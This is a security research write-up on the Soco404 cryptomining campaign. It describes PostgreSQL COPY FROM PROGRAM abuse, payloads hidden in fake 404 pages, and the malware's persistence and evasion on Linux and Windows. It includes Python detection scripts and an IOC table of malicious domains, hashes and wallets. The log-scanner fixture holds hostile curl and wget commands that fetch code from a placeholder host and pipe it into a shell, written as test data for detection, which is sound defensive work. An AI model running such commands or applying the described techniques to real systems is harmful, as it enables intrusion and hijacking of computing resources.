Beware of Fake Error Pages Deploying Platform-Specific Malware on Linux and Windows Systems
Wiz Research has uncovered an active cryptomining campaign, dubbed Soco404, that exploits misconfigurations in PostgreSQL databases and other cloud services to deploy platform-specific malware on both Linux and Windows systems.
This operation, part of a broader crypto-scam infrastructure, leverages opportunistic scanning for exposed services, abusing features like PostgreSQL’s COPY FROM PROGRAM for remote code execution (MITRE T1190).
Attackers target publicly accessible instances, which Wiz data indicates affect nearly one-third of self-hosted PostgreSQL deployments in cloud environments, representing a high-risk attack surface.
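As an added illustration of the detection side of this (not code from Wiz or from the article), the following Python scans PostgreSQL server logs for the COPY ... FROM PROGRAM / TO PROGRAM statements the campaign abuses, and carries an audit query for the roles able to run them. It assumes `log_statement = 'all'` and a `log_line_prefix` of `'%m [%p] %u@%d '`; the log lines are constructed samples, and `example.invalid` is a placeholder host.

```python
import re
from dataclasses import dataclass

# Constructed sample PostgreSQL server log (assumes log_statement = 'all' and a
# log_line_prefix of '%m [%p] %u@%d '); none of these lines come from the campaign.
SAMPLE_LOG = """\
2025-07-24 09:12:03.101 UTC [2211] app@appdb LOG:  statement: SELECT id, name FROM customers WHERE id = 42
2025-07-24 09:12:07.455 UTC [2214] postgres@postgres LOG:  statement: COPY cmd_out FROM PROGRAM 'curl -fsSL http://example.invalid/x.sh | sh'
2025-07-24 09:12:08.002 UTC [2214] postgres@postgres LOG:  statement: copy t from program $$wget -qO- http://example.invalid/y.sh$$
2025-07-24 09:12:09.310 UTC [2215] app@appdb LOG:  statement: COPY customers FROM '/tmp/import.csv' CSV
2025-07-24 09:12:10.000 UTC [2216] postgres@postgres LOG:  statement: COPY (SELECT 1) TO PROGRAM 'cat > /tmp/out'
"""

# One statement-log line in the prefix format assumed above.
LOG_LINE = re.compile(
    r"^(?P<ts>\S+ \S+ \S+) \[(?P<pid>\d+)\] (?P<user>[^@\s]+)@(?P<db>\S+) "
    r"LOG:\s+statement: (?P<sql>.*)$"
)
# COPY ... FROM PROGRAM runs a shell command as the postgres OS user and reads its
# output; TO PROGRAM pipes data into a command. Both deserve an alert outside known jobs.
PROGRAM_COPY = re.compile(r"\bCOPY\b.*?\b(FROM|TO)\s+PROGRAM\b", re.IGNORECASE | re.DOTALL)

# Audit query (run as a privileged user) listing roles able to execute server-side
# programs: superusers and members of pg_execute_server_program (PostgreSQL 11+).
AUDIT_ROLES_SQL = """
SELECT rolname, rolsuper,
       pg_has_role(oid, 'pg_execute_server_program', 'member') AS can_run_programs
FROM pg_roles
WHERE rolsuper OR pg_has_role(oid, 'pg_execute_server_program', 'member');
"""


@dataclass
class Finding:
    timestamp: str
    pid: int
    user: str
    database: str
    direction: str   # "FROM" (command output read into a table) or "TO" (data piped to a command)
    sql: str


def find_program_copies(log_text: str) -> list[Finding]:
    """Return every logged statement that invokes COPY ... FROM/TO PROGRAM."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue  # continuation lines, non-statement messages, other prefixes
        pm = PROGRAM_COPY.search(m.group("sql"))
        if pm:
            findings.append(Finding(m.group("ts"), int(m.group("pid")), m.group("user"),
                                    m.group("db"), pm.group(1).upper(), m.group("sql")))
    return findings


if __name__ == "__main__":
    for f in find_program_copies(SAMPLE_LOG):
        print(f"{f.timestamp} pid={f.pid} {f.user}@{f.database} COPY {f.direction} PROGRAM: {f.sql}")
```

Against the sample, the two FROM PROGRAM statements and the TO PROGRAM statement are reported while the ordinary file-based COPY is not. Because any role that can run these statements executes commands as the database's OS user, the audit query is the first thing to run on an instance that was reachable from the internet with weak credentials.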
Exploitation of Cloud Misconfigurations
After gaining access through weak credentials or vulnerabilities such as CVE-2025-24813 in Apache Tomcat, the threat actors host their payloads on compromised legitimate servers, including a notable Korean transportation website, so that downloads blend in with benign traffic and evade detection.
The campaign employs process masquerading (MITRE T1036.005), disguising malicious binaries as legitimate system processes like sd-pam or kernel workers, and ensures persistence through cron jobs (MITRE T1053.003) and modifications to shell initialization files such as .bashrc and .profile (MITRE T1546.004).
Malware payloads are ingeniously embedded as base64-encoded blobs within fake 404 error pages hosted on Google Sites and custom domains, which display innocuous error messages but facilitate payload extraction and execution upon access.
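The fake 404 pages described above can be hunted for directly: a page that renders as an error but carries a long base64 run with an executable's magic bytes is worth flagging. The scanner below is an added example, not Wiz's tooling or anything from the campaign; the 404 page and the ELF-header stub inside it are constructed fixtures, and the thresholds (64-character runs, 64 decoded bytes) are the author's choices.

```python
import base64
import binascii
import hashlib
import re
from dataclasses import dataclass

# Constructed fixture: a page that renders as an ordinary 404 but carries a base64
# blob in a hidden element. The blob is a fabricated ELF-header stub, not a payload.
_STUB_ELF = b"\x7fELF\x02\x01\x01\x00" + b"\x00" * 8 + b"stub-not-a-real-binary" + b"\x00" * 40
SAMPLE_404_PAGE = (
    "<html><head><title>404 Not Found</title></head><body>"
    "<h1>Not Found</h1><p>The requested URL was not found on this server.</p>"
    '<div style="display:none">' + base64.b64encode(_STUB_ELF).decode() + "</div>"
    "</body></html>"
)

# Long unbroken base64 runs; ordinary error pages rarely carry them outside data: URIs.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{64,}={0,2}")
MIN_DECODED_BYTES = 64   # also keeps 64-char hex hashes (48 decoded bytes) out of the results

# Leading bytes that identify the decoded content.
MAGIC = [
    (b"\x7fELF", "ELF executable"),
    (b"MZ", "PE executable"),
    (b"#!", "script with shebang"),
    (b"\x1f\x8b", "gzip stream"),
]


@dataclass
class EmbeddedBlob:
    offset: int          # character offset of the run in the page
    encoded_len: int
    decoded_len: int
    kind: str
    sha256: str          # compare against hash-based IoCs


def classify(data: bytes) -> str:
    """Name the decoded content from its magic bytes, falling back to a printability test."""
    for magic, kind in MAGIC:
        if data.startswith(magic):
            return kind
    # Mostly printable text is likely a script without a shebang; anything else is opaque binary.
    printable = sum(32 <= b < 127 or b in (9, 10, 13) for b in data)
    return "text" if printable / len(data) > 0.95 else "unknown binary"


def scan_page(html: str) -> list[EmbeddedBlob]:
    """Locate and classify base64 blobs embedded in a page body."""
    blobs = []
    for m in B64_RUN.finditer(html):
        run = m.group(0)
        try:
            data = base64.b64decode(run, validate=True)
        except binascii.Error:
            continue  # not valid base64 (bad length or padding), e.g. a long token
        if len(data) < MIN_DECODED_BYTES:
            continue
        blobs.append(EmbeddedBlob(m.start(), len(run), len(data), classify(data),
                                  hashlib.sha256(data).hexdigest()))
    return blobs


if __name__ == "__main__":
    for b in scan_page(SAMPLE_404_PAGE):
        print(f"offset={b.offset} encoded={b.encoded_len} decoded={b.decoded_len} "
              f"kind={b.kind} sha256={b.sha256}")
```

The SHA-256 of each decoded blob is what you compare with the hash indicators published for the campaign; the `kind` field is there so a hit on a "404" page hosting an ELF or PE stands out immediately in a proxy or sandbox report.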

In-Depth Technical Breakdown
In the Linux variant, attackers execute an in-memory dropper script, soco.sh, fetched via tools like curl or wget from compromised Apache Tomcat servers (MITRE T1105).
This script downloads a UPX-packed Go binary obfuscated with Garble (MITRE T1027), which unpacks in memory, spawns child processes communicating over local sockets (MITRE T1559), and connects to C2 domains like www.fastsoco.top for the main payload.
The binary eliminates competing miners by clearing ld.so.preload, killing rival processes, and wiping logs (MITRE T1070.002), and, if running as root, tunes the system for mining by enabling huge pages and writing to model-specific registers (MSRs) on AMD or Intel CPUs.
Persistence is reinforced by cron entries and shell file injections, leading to cryptocurrency mining on pools like c3pool and moneroocean using specific wallet addresses.
For Windows, the payload ok.exe is delivered via certutil, PowerShell Invoke-WebRequest, or curl fallbacks, dropping to writable paths like C:\Users\Public.
It establishes persistence as a service (MITRE T1543.003) with random names, injects into conhost.exe (MITRE T1055), deploys the WinRing0.sys driver for resource access, and halts event logging (MITRE T1562.002) before initiating mining with the same wallets.
Evidence links Soco404 to crypto-scam sites like seeyoume.top, which mimic legitimate exchanges and embed similar payloads, suggesting a versatile operation blending cryptojacking with social engineering.
Wiz’s Dynamic Scanner identifies exposed PostgreSQL with weak credentials, while the Runtime Sensor detects anomalous behaviors from exploitation to mining (MITRE T1496). This campaign remains active, with dynamic worker counts in mining pools indicating ongoing infections.
Indicators of Compromise (IOCs)
| Indicator | Description |
|---|---|
| c9bb137d56fab7d52b3dbc85ae754b79d861a118bfb99566faaa342c978285ff | SHA-256 of soco.sh |
| bac4b166dec1df8aa823a15136c82c8b50960b11a0c4da68b8d7dedcb0f3a794 | SHA-256 of soco.sh |
| c67e876d7b3ae5f3c4fd626d8ba62e77bd47dfdf51f7a4438edd64bd0f88ce3a | SHA-256 of soco.sh |
| 039caa15c1a54b49250717e68cd1a78a4be17b80e8062441c340eba0674e5926 | SHA-256 of ldr.sh |
| 0ad013c5166900b9c57a7ff771dbbf8b11f8a3be46a85cff6ced83ceb1a38f8d | SHA-256 of ldr.sh |
| 68bb9e294ba7f1b0426e16abbdb5c8f29daa8e8d98aee7a430ead97f2ffadd3a | SHA-256 of ELF malware |
| 8d06979a38ee5ef6f03817a1d16ab75171528cfaf8f743bfe64b45abd6c26142 | SHA-256 of ok.exe Windows malware |
| https://sites.google.com/view/2025soco/ | Payload hosting site |
| https://sites.google.com/view/dblikes | Payload hosting site |
| https://sites.google.com/view/sogoto | Payload hosting site |
| https://sites.google.com/view/osk05 | Payload hosting site |
| www.fastsoco.top | Payload hosting site |
| dblikes.cyou | Payload hosting site |
| seeyoume.top | Payload hosting site |
| arcticoins.com | Crypto scam domain |
| diamondcapitalcrypro.com | Crypto scam domain |
| nordicicoins.com | Crypto scam domain |
| hkcapitals.com | Crypto scam domain |
| auto.c3pool.org | Mining pool |
| gulf.moneroocean.stream | Mining pool |
| 483F2xjkCUegxPM7wAexam1Be67EqDRZpS7azk8hcGETSustmuxd1Agffa3XSHFyzeFprLyHKm37bTPShFUTKgctMSBVuuK | Attacker’s crypto wallet address |
| 8BmVXbfsnRsiyPfUxsfnyyA9LqXvUsF2DYBX3wUmCEtejnBMyTiXe3XDCvq4REjmviEc5J1gomsnv7e4wYy1c5Pz3VadeyZ | Attacker’s crypto wallet address |